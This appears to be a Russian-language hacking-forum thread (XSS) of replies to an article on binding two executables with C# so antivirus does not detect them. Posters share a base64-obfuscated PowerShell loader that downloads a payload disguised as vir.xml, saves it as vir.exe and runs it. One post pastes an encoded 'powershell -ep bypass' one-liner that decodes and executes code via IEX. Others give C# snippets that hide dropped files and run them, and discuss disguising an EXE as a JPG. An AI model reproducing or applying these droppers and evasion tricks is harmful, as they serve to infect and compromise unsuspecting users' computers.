• XSS.stack #1 – первый литературный журнал от юзеров форума

Статья Клеем 2 программы в 1 без палева до запуска если да же ваши exe очень палятся АВ.

Спасибо, хорошая статья, я делаю примерно тоже самое только через powershell, где строки команд в sfx лоадере powershell закриптованные в base64 скачивают сервера другой sfx архив в формате vir.xml, сохраняет в vir.exe и тут же запускает "invoke-wmimethod win32_process -name create -EnableAllPrivileges -argumentlist 'C:\Windows\Temp\ vir.exe -p123' }. Палиться может только сам скаченный вирь, но не прцесс запуска.
 
Спасибо, хорошая статья, я делаю примерно тоже самое только через powershell, где строки команд в sfx лоадере powershell закриптованные в base64 скачивают сервера другой sfx архив в формате vir.xml, сохраняет в vir.exe и тут же запускает "invoke-wmimethod win32_process -name create -EnableAllPrivileges -argumentlist 'C:\Windows\Temp\ vir.exe -p123' }. Палиться может только сам скаченный вирь, но не прцесс запуска.

А подробнее не распишешь, что делать.
 
А подробнее не распишешь, что делать.
Сори, пока нет времени, вроде автор этого топика обещал рассказать как типа запускать закриптованные штуки, к примеру вот такие, копи паст батник в консоль cmd:
Код:
powershell -ep bypass "$JbRYZhgEd = [Text.Encoding]::UTF8.GetString(([Text.Encoding]::UTF8.GetBytes('W8uaHNzei5vdWNeh0d2coJi8vOHBzNzLHMveScpbmh03vZXQuZX94cyhlYgTmQlY3dlYlV0LpKE5YSUVPYm1ldyYWRvbmxpbmJTdH3WVuakNsRG9udCk') | Sort-Object { Get-Random -SetSeed 302911457 })); $R = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($JbRYZhgEd)); IEX $R"
 
кривые руки не дают покоя)
где я косячу? все делаю как надо



при сборке выдает такую шнягу, на выходе сборное exe не запускается,

перевод предупреждения
1> MSBUILD: предупреждение: Fody: Не удалось найти файл FodyWeavers.xml на уровне проекта (C: \ Users \ *** \ source \ repos \ TEST \ TEST). Файл по умолчанию был создан. Пожалуйста, просмотрите файл и добавьте его в свой проект.

файл на месте

upload photos
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
как сделать чтобы при последующих запусков основного exe , не распоковывался в ту же директорию?
C#:
 if (!File.Exists(dir + "\\" + file))
Для начала нужно понять при каком условии будет это делать.
Если просто нужно изменить директорию распаковки можно добавить папку к примеру:
C#:
 if (!File.Exists(dir + "\\Patch" + file))

Или в распаковать в User\AppData\Local
C#:
public static string dirlocal = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData)
C#:
 if (!File.Exists(dirlocal + "\\" + file))

кривые руки не дают покоя)
где я косячу? все делаю как надо



при сборке выдает такую шнягу, на выходе сборное exe не запускается,

перевод предупреждения
1> MSBUILD: предупреждение: Fody: Не удалось найти файл FodyWeavers.xml на уровне проекта (C: \ Users \ *** \ source \ repos \ TEST \ TEST). Файл по умолчанию был создан. Пожалуйста, просмотрите файл и добавьте его в свой проект.

файл на месте

upload photos

Переустанови пакет Fody, удали и установи
 
Последнее редактирование:
Пожалуйста, обратите внимание, что пользователь заблокирован
кривые руки не дают покоя)
где я косячу? все делаю как надо



при сборке выдает такую шнягу, на выходе сборное exe не запускается,

перевод предупреждения
1> MSBUILD: предупреждение: Fody: Не удалось найти файл FodyWeavers.xml на уровне проекта (C: \ Users \ *** \ source \ repos \ TEST \ TEST). Файл по умолчанию был создан. Пожалуйста, просмотрите файл и добавьте его в свой проект.

файл на месте

upload photos
Действительно, та же фигня с Fody сегодня была, установи Fody 6.0 версию, не новее. Будет работать.
 
Действительно, та же фигня с Fody сегодня была, установи Fody 6.0 версию, не новее. Будет работать.
Fody по дефолту 6.0 ставится , обновил до 6.5, предупреждения нет, exe мое все равно

 
Пожалуйста, обратите внимание, что пользователь заблокирован
Fody по дефолту 6.0 ставится , обновил до 6.5, предупреждения нет, exe мое все равно

Могу предположить что дело не в Fody, кинь в лс весь проект. гляну.
 
Последнее редактирование:
Всем привет, снова небольшая статейка от меня, как и моя прежняя статья она ориентирована на новичков и профи в этой сфере, подойдет каждому.
Точнее в этой статье основываясь на прошлой я реально расписал все по кликам... куда уж проще хз...да же 5-ти летний ребенок умеющий читать разберется и напишет свой первый софт.
Я опишу метод склеивания двух exe в один, посредством C# (.Net) к тому же это будет полный фуд

Все тех. вопросы пишите в статью. В лс не надо. Тут я буду стараться отвечать каждому.
Всем спасибо и удачи мего кодеры!
// © ViCode, https://xss.pro/members/186547/

Подскажите пожалуйста
А можно так же склеить JPG с EXE а не два EXE фаила?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Из коробки исходники уже так:

6ae72fce1f.jpg
 
Никто не ответил, хочу продублировать.
Подскажите пожалуйста
Можно ли склеить JPG с EXE а не два EXE фаила?
Я не спрашиваю как именно в деталях.
В принципе это можно сделать тупо заменив данные в коде или
это сложнее?
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Никто не ответил, хочу продублировать.
Подскажите пожалуйста
Можно ли склеить JPG с EXE а не два EXE фаила?
Я не спрашиваю как именно в деталях.
В принципе это можно сделать тупо заменив данные в коде или
это сложнее?
Можно, на выходе все равно будет exe который откроет твой jpg
 
Никто не ответил, хочу продублировать.
Подскажите пожалуйста
Можно ли склеить JPG с EXE а не два EXE фаила?
Можно , но на выходе всё равно будет исполняемый файл.

ViCode опередил )
 
Пожалуйста, обратите внимание, что пользователь заблокирован
автоматизируйте кто нибудь
Зачем...мб еще билдер сделать чтоб убили за неделю)) учитесь сами ручками делать.
 
Можно, на выходе все равно будет exe который откроет твой jpg
Это понятно спасибо. Иду голосовать за статью ))). А как сделать, просто поменять exe2.exe на 2.jpg ?

File.SetAttributes(dir + "\\2.jpg", FileAttributes.Hidden | FileAttributes.System); // Скрываем от пользователя
Process proc = Process.Start(dir + "\\2.jpg"); //Запускаем jpg

}
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Хотел написать что статья очень крутая, все понятно и все доступно описано

Спасибо автору за его вклад!!!
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх